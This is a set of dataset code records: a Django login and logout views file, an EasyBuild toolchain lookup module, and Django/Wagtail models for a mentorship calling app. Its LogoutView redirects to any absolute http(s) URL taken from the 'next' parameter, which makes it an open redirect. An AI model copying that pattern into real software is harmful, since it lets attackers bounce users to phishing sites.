None:\n allowed_methods = LoginMethod.objects.all()\n\n methods = []\n for m in allowed_methods:\n assert isinstance(m, LoginMethod)\n if m.provider_id == 'saml':\n continue # SAML support removed\n\n m.login_url = reverse('social:begin', kwargs={'backend': m.provider_id})\n if next_url:\n m.login_url += '?next=' + next_url\n\n methods.append(m)\n\n if len(methods) == 1:\n return redirect(methods[0].login_url)\n\n self.login_methods = methods\n return super(LoginView, self).get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(LoginView, self).get_context_data(**kwargs)\n context['login_methods'] = self.login_methods\n return context\n\n\nclass LogoutView(TemplateView):\n template_name = 'logout_done.html'\n\n def get(self, *args, **kwargs):\n if self.request.user.is_authenticated:\n auth_logout(self.request)\n url = self.request.GET.get('next')\n if url and re.match(r'http[s]?://', url):\n return redirect(url)\n return super(LogoutView, self).get(*args, **kwargs)\n\n\nclass EmailNeededView(TemplateView):\n template_name = 'email_needed.html'\n\n def get_context_data(self, **kwargs):\n context = super(EmailNeededView, self).get_context_data(**kwargs)\n reauth_uri = self.request.GET.get('reauth_uri', '')\n if '//' in reauth_uri: # Prevent open redirect\n reauth_uri = ''\n context['reauth_uri'] = reauth_uri\n return context\n\n\nclass AuthenticationErrorView(TemplateView):\n template_name = 'account/signup_closed.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass 
TunnistamoOidcAuthorizeView(AuthorizeView):\n def get(self, request, *args, **kwargs):\n request.GET = _extend_scope_in_query_params(request.GET)\n request_locales = [l.strip() for l in request.GET.get('ui_locales', '').split(' ') if l]\n available_locales = [l[0] for l in settings.LANGUAGES]\n\n for locale in request_locales:\n if locale in available_locales:\n with translation.override(locale):\n return super().get(request, *args, **kwargs)\n\n return super().get(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n request.POST = _extend_scope_in_query_params(request.POST)\n return super().post(request, *args, **kwargs)\n\n\ndef _extend_scope_in_query_params(query_params):\n scope = query_params.get('scope')\n if scope:\n query_params = query_params.copy()\n query_params['scope'] = _add_api_scopes(scope)\n return query_params\n\n\ndef _add_api_scopes(scope_string):\n scopes = scope_string.split()\n extended_scopes = ApiScope.extend_scope(scopes)\n return ' '.join(extended_scopes)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"221023963","text":"# #\n# Copyright 2012-2014 Ghent University\n#\n# This file is part of EasyBuild,\n# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),\n# with support of Ghent University (http://ugent.be/hpc),\n# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),\n# the Hercules foundation (http://www.herculesstichting.be/in_English)\n# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).\n#\n# http://github.com/hpcugent/easybuild\n#\n# EasyBuild is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation v2.\n#\n# EasyBuild is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with EasyBuild. 
If not, see .\n# #\n\"\"\"\nToolchain utility module\n\nEasy access to actual Toolchain classes\n search_toolchain\n\nBased on VSC-tools vsc.mympirun.mpi.mpi and vsc.mympirun.rm.sched\n\n@author: Stijn De Weirdt (Ghent University)\n@author: Kenneth Hoste (Ghent University)\n\"\"\"\nimport glob\nimport os\nimport re\nimport sys\nfrom vsc.utils import fancylogger\nfrom vsc.utils.missing import get_subclasses, nub\n\nimport easybuild.tools.toolchain\nfrom easybuild.tools.toolchain.toolchain import Toolchain\nfrom easybuild.tools.utilities import import_available_modules\n\n\nTC_CONST_PREFIX = 'TC_CONSTANT_'\n\n\ndef search_toolchain(name):\n \"\"\"\n Find a toolchain with matching name\n returns toolchain (or None), found_toolchains\n \"\"\"\n\n log = fancylogger.getLogger(\"search_toolchain\")\n\n package = easybuild.tools.toolchain\n check_attr_name = '%s_PROCESSED' % TC_CONST_PREFIX\n\n if not hasattr(package, check_attr_name) or not getattr(package, check_attr_name):\n # import all available toolchains, so we know about them\n tc_modules = import_available_modules('easybuild.toolchains')\n\n # make sure all defined toolchain constants are available in toolchain module\n tc_const_re = re.compile('^%s(.*)$' % TC_CONST_PREFIX)\n for tc_mod in tc_modules:\n # determine classes imported in this module\n mod_classes = []\n for elem in [getattr(tc_mod, x) for x in dir(tc_mod)]:\n if hasattr(elem, '__module__'):\n # exclude the toolchain class defined in that module\n if not tc_mod.__file__ == sys.modules[elem.__module__].__file__:\n log.debug(\"Adding %s to list of imported classes used for looking for constants\" % elem.__name__)\n mod_classes.append(elem)\n\n # look for constants in modules of imported classes, and make them available\n for mod_class_mod in [sys.modules[mod_class.__module__] for mod_class in mod_classes]:\n for elem in dir(mod_class_mod):\n res = tc_const_re.match(elem)\n if res:\n tc_const_name = res.group(1)\n tc_const_value = getattr(mod_class_mod, elem)\n log.debug(\"Found constant %s ('%s') in module %s, adding it to %s\" % (tc_const_name,\n tc_const_value,\n mod_class_mod.__name__,\n package.__name__))\n if hasattr(package, tc_const_name):\n cur_value = getattr(package, tc_const_name)\n if not tc_const_value == cur_value:\n log.error(\"Constant %s.%s defined as '%s', can't set it to '%s'.\" % (package.__name__,\n tc_const_name,\n cur_value,\n tc_const_value\n ))\n else:\n setattr(package, tc_const_name, tc_const_value)\n\n # indicate that processing of toolchain constants is done, so it's not done again\n setattr(package, check_attr_name, True)\n else:\n log.debug(\"Skipping importing of toolchain modules, processing of toolchain constants is already done.\")\n\n # obtain all subclasses of toolchain\n found_tcs = nub(get_subclasses(Toolchain))\n\n # filter found toolchain subclasses based on whether they can be used a toolchains\n found_tcs = [tc for tc in found_tcs if tc._is_toolchain_for(None)]\n\n for tc in found_tcs:\n if tc._is_toolchain_for(name):\n return tc, found_tcs\n\n return None, found_tcs\n","sub_path":"1.13.0/easybuild/tools/toolchain/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416575470","text":"import os\nimport logging\nfrom datetime import timedelta\n\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.conf import settings\nfrom django.db.models.signals import post_save\nfrom 
django.dispatch import receiver\nfrom django.contrib.auth.models import User\nfrom django_comments.models import Comment\nfrom django.db.models.signals import post_delete\nfrom django.utils import timezone\n\nfrom polymorphic.models import PolymorphicModel\n\nfrom comms import models as comms_models\n\nfrom mentor.blocks import MarkDownBlock\n\nfrom mentor.utils import (\n pick,\n conjoin,\n assign,\n send_notification_to_fcm,\n display_datetime,\n display_date,\n display_time)\n\nfrom wagtail.wagtailcore.models import Page\nfrom wagtail.wagtailcore.fields import StreamField\nfrom wagtail.wagtailsearch import index\nfrom wagtail.wagtailimages.edit_handlers import ImageChooserPanel\nfrom wagtail.wagtailadmin.edit_handlers import (\n FieldPanel, StreamFieldPanel)\nfrom wagtail.wagtailcore import blocks\nfrom wagtail.wagtailimages.blocks import ImageChooserBlock\n\nlog = logging.getLogger(__name__)\n\n\nclass Main(Page):\n parent_page_types = []\n subpage_types = ['CategoryIndexPage']\n\n\nclass Contact(models.Model):\n user = models.OneToOneField(User, related_name=\"contact_details\",\n primary_key=True)\n contact_number = models.CharField(blank=False,\n null=True,\n max_length=32,\n default=\"\", )\n external_id = models.CharField(blank=True, max_length=128)\n\n def __str__(self):\n return self.user.get_full_name() or self.user.username\n\n @property\n def mentor(self):\n # See https://github.com/praekelt/mentorship/pull/199 for why we need\n # this @property\n return self.as_mentor\n\n @property\n def mentee(self):\n # See https://github.com/praekelt/mentorship/pull/199 for why we need\n # this @property\n return self.as_mentee\n\n\nclass Mentee(Contact):\n as_contact = models.OneToOneField(\n Contact,\n parent_link=True,\n related_name=\"as_mentee\")\n\n\ndef profile_pic_path(instance, filename):\n \"\"\"Return the full path for the given profile picture.\"\"\"\n # This reads the PROFILE_UPLOADS setting dynamically to make it easier\n # override in tests and to avoid reading it as soon as the module is\n # imported.\n return os.path.join(settings.PROFILE_UPLOADS, filename)\n\n\nclass Mentor(Contact):\n as_contact = models.OneToOneField(\n Contact,\n parent_link=True,\n related_name=\"as_mentor\")\n mentee = models.OneToOneField(\n Mentee,\n related_name=\"mentor\",\n on_delete=models.SET_NULL,\n null=True,\n blank=True)\n profile_pic = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n job_sector = models.CharField(max_length=100, null=True, blank=True)\n job_title = models.CharField(max_length=100, null=True, blank=True)\n motivation = models.CharField(max_length=500, null=True, blank=True)\n inspiration = models.CharField(max_length=500, null=True, blank=True)\n tags = models.CharField(max_length=500, null=True, blank=True)\n skills = models.CharField(max_length=500, null=True, blank=True)\n activity = models.ManyToManyField(\n 'Activity', related_name='mentors', blank=True, null=True)\n latest_post_date = models.DateTimeField(blank=True, null=True)\n\n\n@receiver(post_save, sender=Mentor,\n dispatch_uid=\"create_notification_settings\")\ndef create_notification_settings(sender, instance, created, **kwargs):\n if created:\n NotificationSettings.objects.create(mentor=instance)\n\n\nclass Call(models.Model):\n UPDATE_FIELDS = (\n 'status',\n 'partner_id',\n 'recording_url',\n 'partner_start_time',\n 'partner_end_time')\n\n STATUS_TYPES = (\n ('SUCCESSFUL', 'Successful'),\n ('SCHEDULED', 'Scheduled'),\n 
('INPROGRESS', 'In Progress'),\n ('INACTIVE', 'Unsuccessful'))\n\n STATUS_DISPLAY_LOOKUP = dict(STATUS_TYPES)\n\n TIMEOUT_DELTA = timedelta(days=1)\n\n start_time = models.DateTimeField(\n auto_now_add=True,\n verbose_name=\"Mentor activated call\")\n end_time = models.DateTimeField(\n blank=True,\n null=True,\n verbose_name=\"System notified of call end\")\n partner_start_time = models.DateTimeField(\n blank=True,\n null=True,\n verbose_name=\"Start time\")\n partner_end_time = models.DateTimeField(\n blank=True,\n null=True,\n verbose_name=\"End time\")\n caller = models.ForeignKey(\n 'Contact',\n related_name=\"caller\",\n verbose_name=\"Mentor\")\n receiver = models.ForeignKey(\n 'Contact',\n related_name=\"receiver\",\n verbose_name=\"Mentee\")\n feedback_task = models.ForeignKey('Task', related_name=\"call\", null=True,\n default=\"\")\n recording_url = models.URLField(max_length=200, null=True, blank=True,\n help_text=\"URL for the call recording\")\n partner_id = models.CharField(\n max_length=100, null=True, blank=True,\n help_text=\"ID used by partner to identify call\")\n activity = models.ForeignKey(\n 'Activity', related_name='activity', blank=True, null=True)\n scheduled_call = models.ForeignKey(\n 'ScheduledCall', related_name='scheduled', blank=True, null=True)\n call_id = models.CharField(\n max_length=255, blank=True, null=True, default='')\n _status = models.CharField(\n blank=False,\n null=False,\n default=\"\",\n max_length=255,\n choices=STATUS_TYPES,\n db_column='status')\n\n @classmethod\n def from_partner_id(self, partner_id):\n if partner_id is None:\n return None\n\n calls = Call.objects.filter(partner_id=partner_id)\n num_calls = len(calls)\n\n if num_calls > 1:\n log.warning(\"Multiple calls matching partner id found\")\n return None\n elif num_calls == 0:\n return None\n else:\n return calls[0]\n\n @property\n def status(self):\n if self._status:\n return self._status\n elif self.end_time is not None:\n return 'SUCCESSFUL'\n elif self.has_timed_out():\n return 'INACTIVE'\n else:\n return 'INPROGRESS'\n\n @status.setter\n def status(self, new_status):\n self._status = new_status\n return new_status\n\n def get_duration(self):\n if all((self.partner_start_time, self.partner_end_time)):\n return self.partner_end_time - self.partner_start_time\n else:\n return None\n\n def get_lag(self):\n if self.partner_start_time is not None:\n return self.partner_start_time - self.start_time\n else:\n None\n\n def get_status_display(self):\n return self.STATUS_DISPLAY_LOOKUP[self.status]\n\n def _create_entering_cdrs(self, next_cdrs):\n curr_cdr_ids = set(\n cdr['partner_id']\n for cdr in self.call_data_records.values('partner_id'))\n\n entering = (\n CallDataRecord(**conjoin(cdr, {'call': self}))\n for cdr in next_cdrs\n if cdr['partner_id'] not in curr_cdr_ids)\n\n CallDataRecord.objects.bulk_create(entering)\n\n def _infer_ended(self, data):\n # compatibility with old onion dev api\n return data.get('partner_end_time') is not None\n\n def has_timed_out(self):\n return (\n self.end_time is None and\n (timezone.now() - self.start_time > self.TIMEOUT_DELTA))\n\n def dial(self):\n api = comms_models.Api.objects.last()\n call_id = api.make_call(\n self.caller.contact_number, self.receiver.contact_number)\n if call_id:\n self.call_id = call_id\n self.save()\n Event.objects.create(description=\"Call started\",\n event_type=\"start_call\",\n relevant_mentor=self.caller.mentor,\n object_id=self.pk)\n\n def update(self, data=None):\n data = (data or {}).copy()\n\n # We only assign if 
we aren't going to be overwriting a non-None value\n # with a None value. This allows us to handle some situations where\n # updates are received in the wrong order. Note that we are not\n # handling out-of-order updates where both the previous and new value\n # are not `None`, but this should be okay for our use case.\n assign(self, pick(data, self.UPDATE_FIELDS), prefer_not_none=True)\n\n self._create_entering_cdrs(data.get('call_data_records', ()))\n\n if data.get('ended', self._infer_ended(data)):\n self.handle_ended_successful(data)\n\n self.save()\n\n def ended(self, data=None):\n return self.update(conjoin(data, {'ended': True}))\n\n def handle_ended_successful(self, data):\n self.end_time = data.get('end_time', timezone.now())\n\n self.feedback_task = Task.objects.create(\n mentor=self.caller.mentor,\n description=(\"Complete feedback for call at %s on %s\") % (\n self.start_time.strftime('%H:%M'),\n self.start_time.strftime('%Y-%m-%d')))\n\n Event.objects.create(\n description=\"Call ended\",\n event_type=\"end_call\",\n relevant_mentor=self.caller.mentor,\n object_id=self.pk)\n\n if self.caller.mentor.notification_settings.call_ended:\n send_notification_to_fcm(\n self.caller.mentor,\n \"CALL_ENDED\",\n str(self.end_time),\n self.pk,\n use_notification=False)\n\n\nclass CallDataRecord(models.Model):\n class Meta:\n verbose_name = 'Call attempt'\n\n call = models.ForeignKey(\n 'call',\n related_name=\"call_data_records\",\n verbose_name=\"Call\")\n\n partner_id = models.CharField(max_length=255)\n start_time = models.DateTimeField()\n status = models.CharField(max_length=255)\n\n\nclass TopicIndexPage(Page):\n parent_page_types = []\n subpage_types = ['Topic']\n\n\nclass Topic(Page):\n parent_page_types = ['mentor.TopicIndexPage']\n subtitle = models.TextField(null=True, blank=True)\n image = models.ForeignKey(\n 'wagtailimages.Image', null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n\nTopic.content_panels = [\n FieldPanel('title', classname='full title'),\n FieldPanel('subtitle', classname='full'),\n ImageChooserPanel('image'),\n]\n\n\nclass Post(Comment):\n parent = models.ForeignKey('self', blank=True, null=True)\n posted_to = models.ForeignKey('Mentor', blank=True, null=True)\n\n\n@receiver(post_save, sender=Post,\n dispatch_uid=\"set_latest_post_date\")\ndef set_latest_post_date(instance, **kwargs):\n mentor = Mentor.objects.filter(user=instance.user).last()\n mentor.latest_post_date = instance.submit_date\n mentor.save()\n\n\nclass PostLike(models.Model):\n mentor = models.ForeignKey('Mentor')\n post = models.ForeignKey('Post', related_name='likes')\n\n\nclass CategoryIndexPage(Page):\n parent_page_types = []\n subpage_types = ['Category']\n\n\nclass Category(Page):\n parent_page_types = ['mentor.CategoryIndexPage']\n image = models.ForeignKey(\n 'wagtailimages.Image', null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n color = models.TextField(default='', null=True, blank=True)\n about = models.TextField(null=True, blank=True)\n goal = models.TextField(null=True, blank=True)\n active = models.BooleanField(default=True)\n\n subpage_types = ['Activity']\n\n\nCategory.content_panels = [\n FieldPanel('title', classname='full title'),\n ImageChooserPanel('image'),\n FieldPanel('color'),\n FieldPanel('about', classname='full'),\n FieldPanel('goal', classname='full'),\n]\n\n\nclass Activity(Page):\n poster = models.ForeignKey(\n 'wagtailimages.Image', null=True,\n blank=True,\n on_delete=models.SET_NULL,\n 
related_name='+'\n )\n icon = models.ForeignKey(\n 'wagtailimages.Image', null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n objective = models.TextField(null=True, blank=True)\n lesson_rationale = models.TextField(null=True, blank=True)\n instructions = models.TextField(null=True, blank=True)\n prompts = models.TextField(null=True, blank=True)\n reflection_points = models.TextField(null=True, blank=True)\n skills_developed = models.TextField(null=True, blank=True)\n active = models.BooleanField(default=True)\n\n def is_complete(self, mentor):\n contact = Contact.objects.get(user=mentor)\n\n qs = BaseCallNote.objects.filter(\n call__activity=self,\n call__caller=contact,\n mentor=contact)\n\n qs = qs.filter(\n Q(CallNoteV1___objective_achieved=True) |\n Q(CallNoteV2___activity_progress='COMPLETED'))\n\n return qs.exists()\n\n def parent(self):\n return Category.objects.ancestor_of(self).first().pk\n\n\nActivity.content_panels = [\n FieldPanel('title', classname='full title'),\n ImageChooserPanel('poster'),\n ImageChooserPanel('icon'),\n FieldPanel('objective', classname='full'),\n FieldPanel('lesson_rationale', classname='full'),\n FieldPanel('instructions', classname='full'),\n FieldPanel('prompts', classname='full'),\n FieldPanel('reflection_points', classname='full'),\n FieldPanel('skills_developed', classname='full'),\n]\n\n\nclass FAQIndexPage(Page):\n parent_page_types = []\n subpage_types = ['FAQ']\n\n\nclass FAQ(Page):\n description = models.TextField(null=True, blank=True)\n subpage_types = []\n search_fields = Page.search_fields + [index.SearchField('description')]\n\n class Meta:\n verbose_name = 'FAQ'\n\n\nFAQ.content_panels = [\n FieldPanel('title', classname='full title'),\n FieldPanel('description'),\n]\n\n\nclass BlogIndexPage(Page):\n parent_page_types = []\n subpage_types = ['Blog']\n\n\nclass Blog(Page):\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+')\n\n thumbnail = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+')\n\n body = StreamField([\n ('heading', blocks.CharBlock(classname=\"full title\")),\n ('paragraph', MarkDownBlock()),\n ('image', ImageChooserBlock()),\n ('list', blocks.ListBlock(blocks.CharBlock(label=\"Item\"))),\n ('numbered_list', blocks.ListBlock(blocks.CharBlock(label=\"Item\"))),\n ], null=True, blank=True)\n\n active = models.BooleanField(default=True)\n\n created_at = models.DateTimeField(default=timezone.now)\n\n subpage_types = []\n search_fields = Page.search_fields + [index.SearchField('body')]\n\n @property\n def is_hidden(self):\n return not self.live or not self.active\n\n class Meta:\n verbose_name = 'Blog'\n\n\nBlog.content_panels = [\n FieldPanel('title', classname='full title'),\n ImageChooserPanel('image'),\n StreamFieldPanel('body'),\n]\n\n\nclass Message(models.Model):\n time_sent = models.DateTimeField(auto_now_add=True)\n sender = models.ForeignKey('Contact', related_name=\"sender\")\n recipient = models.ForeignKey('Contact', related_name=\"recipient\")\n message_type = models.CharField(\n blank=False,\n null=False,\n default=\"\",\n max_length=10,\n choices=(\n ('USER', 'Individual'),\n ('SYSTEM', 'Automated')))\n content = models.CharField(\n blank=False,\n null=False,\n max_length=144,\n default=\"\")\n\n @classmethod\n def send_and_create(cls, *args, **kwargs):\n msg = cls(*args, **kwargs)\n msg.send()\n msg.save()\n return msg\n\n def send(self):\n api 
= comms_models.Api.objects.last()\n api.send_message(\n self.sender.contact_number,\n self.recipient.contact_number,\n self.content\n )\n\n def receive_message(self):\n Event.objects.create(\n description=\"Received message: '\" + self.content + \"'\",\n event_type=\"receive_message\",\n relevant_mentor=self.recipient.mentor, object_id=self.pk)\n\n if self.recipient.mentor.notification_settings.new_message:\n send_notification_to_fcm(self.recipient.mentor, \"NEW_MESSAGE\",\n self.content, self.pk)\n\n def __str__(self):\n return self.content\n\n\nclass ScheduledCall(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n call_time = models.DateTimeField(blank=False,\n null=False)\n caller = models.ForeignKey('Mentor')\n callee = models.ForeignKey('Mentee')\n activity = models.ForeignKey('Activity', blank=True, null=True)\n\n def notify_callee(self, message):\n return Message.send_and_create(\n sender=self.caller, recipient=self.callee,\n content=message, message_type='SYSTEM')\n\n def notify_callee_scheduled(self):\n self.notify_callee(\n \"Your next mentoring call has been scheduled for %s\" %\n display_datetime(self.call_time))\n\n def notify_callee_rescheduled(self, new_time):\n self.notify_callee(\n \"Your mentoring call on %s has been moved to %s\" %\n (display_datetime(self.call_time), display_datetime(new_time)))\n\n def notify_callee_cancelled(self):\n self.notify_callee(\n \"Your mentoring call on %s has been cancelled\" %\n display_datetime(self.call_time))\n\n def remind_caller(self, reminder_type, text=None):\n if text is None:\n text = \"You have a call scheduled for %(time)s.\"\n\n text = text % {\n 'date': display_date(self.call_time),\n 'time': display_time(self.call_time),\n }\n\n result = send_notification_to_fcm(\n self.caller, reminder_type, text, self.pk)\n\n CallReminder.objects.create(\n scheduled_call=self,\n reminder_type=reminder_type)\n\n return result\n\n\nclass CallReminder(models.Model):\n scheduled_call = models.ForeignKey('ScheduledCall')\n reminder_type = models.CharField(max_length=20)\n\n\nclass Task(models.Model):\n STATUS = (\n ('pending', 'Pending'),\n ('in-progress', 'In progress'),\n ('done', 'Done')\n )\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(blank=True, null=True)\n mentor = models.ForeignKey('Mentor')\n description = models.CharField(blank=False,\n null=False,\n max_length=200,\n default=\"\")\n link = models.URLField(blank=True, null=True, default=\"\")\n due_date = models.DateField(blank=True, null=True)\n status = models.CharField(max_length=50,\n choices=STATUS,\n default='pending')\n\n\nclass Event(models.Model):\n occured_at = models.DateTimeField(auto_now_add=True)\n event_type = models.CharField(blank=False,\n null=False,\n max_length=50,\n default=\"\")\n description = models.CharField(blank=False,\n null=False,\n max_length=200,\n default=\"\")\n relevant_mentor = models.ForeignKey('Mentor')\n object_id = models.PositiveIntegerField(null=True, blank=True)\n\n\nclass Feedback(models.Model):\n received_at = models.DateTimeField(\n null=True,\n auto_now_add=True,\n verbose_name=\"System received IVR feedback\")\n start_time = models.DateTimeField(null=True)\n sender = models.ForeignKey('Contact', related_name=\"feedback\")\n call = models.ForeignKey('Call', blank=True, null=True,\n related_name=\"feedback\")\n question_one = models.CharField(max_length=200, null=True, blank=True)\n question_two = models.CharField(max_length=200, null=True, blank=True)\n question_three = 
models.CharField(max_length=200, null=True, blank=True)\n question_four = models.CharField(max_length=200, null=True, blank=True)\n complete = models.BooleanField(\n default=True,\n help_text=(\n \"A status flag indicating whether the feedback survey was fully\"\n \" completed. It should be set to true if the survey was fully\"\n \" completed and false if the survey was submitted incomplete.\"))\n\n class Meta:\n verbose_name = 'IVR'\n verbose_name_plural = 'IVRs'\n\n\nclass BaseCallNote(PolymorphicModel):\n version = None\n mentor = models.ForeignKey('Contact', related_name=\"call_note\")\n call = models.ForeignKey('Call', related_name=\"call_note\")\n created_at = models.DateTimeField(default=timezone.now)\n\n\nclass CallNoteV1(BaseCallNote):\n version = '1'\n reflection = models.TextField(blank=False, null=False, default=\"\")\n mentee_state = models.TextField(\n blank=False,\n null=False,\n default=\"\",\n choices=(\n ('happy', 'Happy'),\n ('sad', 'Sad'),\n ('bored', 'Bored'),\n ('confused', 'Confused'),\n ('upset', 'Upset'),\n ('withdrawn', 'Withdrawn')))\n objective_achieved = models.BooleanField(default=False)\n activity_helpful = models.TextField(\n blank=False,\n null=False,\n default=\"\",\n choices=(\n ('0', 'Not at all'),\n ('1', 'A little'),\n ('2', 'Somewhat'),\n ('3', 'Quite a bit'),\n ('4', 'A lot')))\n call_quality = models.TextField(\n blank=False,\n null=False,\n default=\"\",\n choices=(\n ('EXCELLENT', 'Excellent'),\n ('OK', 'Ok'),\n ('INAUDIBLE', 'Inaudible'),\n ('DROPPED', 'Dropped'),\n ('DELAYED', 'Delayed')))\n\n\nclass CallNoteV2(BaseCallNote):\n version = '2'\n call_result = models.TextField(\n choices=(\n ('COMPLETED', 'Completed'),\n ('PARTIALLY_COMPLETED', 'Partially completed'),\n ('MENTEE_NOT_AVAILABLE', 'Mentee not available'),\n ('MENTEE_RESCHEDULED', 'Mentee rescheduled')))\n activity_progress = models.TextField(\n null=True,\n choices=(\n ('COMPLETED', 'Completed'),\n ('PARTIALLY_COMPLETED', 'Partially completed'),\n ('NOT_USED', 'Not used')))\n reflection = models.TextField()\n mood = models.TextField(\n default=\"\",\n choices=(\n ('HAPPY', 'Happy'),\n ('ENGAGED', 'Engaged'),\n ('EXCITED', 'Excited'),\n ('BORED', 'Bored'),\n ('SAD', 'Sad'),\n ('CONFUSED', 'Confused'),\n ('WITHDRAWN', 'Withdrawn'),\n ('UPSET', 'Upset')))\n objective_achieved = models.TextField(\n blank=True,\n choices=(\n ('1', '1'),\n ('2', '2'),\n ('3', '3'),\n ('4', '4'),\n ('5', '5')))\n rating = models.TextField(\n blank=True,\n choices=(\n ('1', '1'),\n ('2', '2'),\n ('3', '3'),\n ('4', '4'),\n ('5', '5')))\n call_quality = models.TextField(\n blank=True,\n choices=(\n ('EXCELLENT', 'Excellent'),\n ('OK', 'Ok'),\n ('INAUDIBLE', 'Inaudible'),\n ('DROPPED', 'Dropped'),\n ('DELAYED', 'Delayed')))\n\n @property\n def saved_activity(self):\n raise Exception(\"saved_activity is a set-only field\")\n\n @saved_activity.setter\n def saved_activity(self, activity):\n '''\n This is a workaround to be able to change the call's activity when\n creating a call note.\n\n A separate request on the client side for updating the call activity\n may seem more sensible, but this would mean we may end up with a\n half-completed operation if one of the two requests fail, which may\n be a consideration if a device's internet connection was flaky\n (which isn't unlikely).\n\n The better solution would be to change the api so that creating call\n notes was provided as updates to call resources, but this is a larger\n change we don't have time for.\n '''\n self.call.activity = activity\n 
self.call.save()\n\n\n# alias for backwards compatibility with the rest of the codebase\nCallNote = CallNoteV1\nCALL_NOTE_VERSIONS = (CallNoteV1, CallNoteV2)\n\n\nclass ResetPasswordRequest(models.Model):\n user = models.ForeignKey(User)\n token = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass NotificationSettings(models.Model):\n mentor = models.OneToOneField('Mentor',\n related_name=\"notification_settings\")\n android_registration_token = models.CharField(\n max_length=200, null=True, blank=True,\n help_text=\"Token used to send push notifications\")\n one_min_call_reminder = models.BooleanField(\n default=True,\n help_text=\"Mentor will be reminded about a call 1 minute before it \"\n \"should start.\")\n ten_min_call_reminder = models.BooleanField(\n default=True,\n help_text=\"Mentor will be reminded about a call 10 minutes before it \"\n \"should start.\")\n one_hour_call_reminder = models.BooleanField(\n default=True,\n help_text=\"Mentor will be reminded about a call 1 hour before it \"\n \"should start.\")\n one_day_call_reminder = models.BooleanField(\n default=True,\n help_text=\"Mentor will be reminded about a call 1 day before it \"\n \"should start.\")\n call_ended = models.BooleanField(\n default=True,\n help_text=\"Mentor will be notified every time a call ends.\")\n new_message = models.BooleanField(\n default=True,\n help_text=\"Mentor will be notified every time a new message arrives.\")\n new_tip = models.BooleanField(\n default=True,\n help_text=\"Mentor will be notified every time there is a new Tip for \"\n \"them\")\n\n class Meta:\n verbose_name = 'Notification settings'\n verbose_name_plural = 'Notification settings'\n\n\nclass CustomPushNotification(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n mentor = models.ForeignKey('Mentor')\n text = models.CharField(max_length=200, null=True)\n\n\n@receiver(post_save, sender=CustomPushNotification,\n dispatch_uid=\"send_custom_notification\")\ndef send_custom_notification(sender, instance, created, **kwargs):\n if created:\n send_notification_to_fcm(instance.mentor, \"The Mentor 2 Go team\",\n instance.text, instance.pk)\n\n\n@receiver(post_delete, sender=Contact, dispatch_uid=\"delete_related_user\")\ndef delete_contact_related_user(sender, instance, **kwargs):\n if User.objects.filter(pk=instance.user.pk).exists():\n instance.user.delete()\n\n\ndef create_event_on_call_note_post_save(sender, instance, created, **kwargs):\n if not created:\n return\n\n Event.objects.create(\n event_type='call_notes_created', description='Call notes created',\n relevant_mentor=instance.mentor.mentor, object_id=instance.pk)\n\n if instance.call.activity:\n category = instance.call.activity.get_parent().specific\n activities = category.get_children().live()\n\n if all([\n activity.specific.is_complete(instance.mentor.user)\n for activity in activities\n ]):\n Event.objects.create(\n event_type='all_activities_completed',\n description='All activities completed',\n relevant_mentor=instance.mentor.mentor,\n object_id=category.pk)\n\n\nfor i, version_cls in enumerate(CALL_NOTE_VERSIONS):\n post_save.connect(\n create_event_on_call_note_post_save,\n sender=version_cls,\n dispatch_uid=\"create_event_on_call_note_post_save_v%s\" % (i + 1))\n","sub_path":"mentorship/mentor/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":28576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
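The record above ends by documenting a set-only property (`saved_activity`) that folds an update of a related object into the same request that creates the call note. A minimal, self-contained sketch of that write-only-property pattern follows; the `Call`/`CallNote` stand-ins and the in-memory `save()` are illustrative assumptions for this sketch, not code from the project in the record:

class Call:
    def __init__(self, activity=None):
        self.activity = activity
        self.saved = False

    def save(self):
        # stand-in for Django's Model.save(); just records that a save happened
        self.saved = True


class CallNote:
    def __init__(self, call):
        self.call = call

    @property
    def saved_activity(self):
        # write-only by design: reading it back is an error
        raise AttributeError("saved_activity is a set-only field")

    @saved_activity.setter
    def saved_activity(self, activity):
        # assigning through the note updates and persists the related call,
        # so the client mutates both objects with a single request
        self.call.activity = activity
        self.call.save()


note = CallNote(Call())
note.saved_activity = "activity-42"
assert note.call.activity == "activity-42" and note.call.saved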
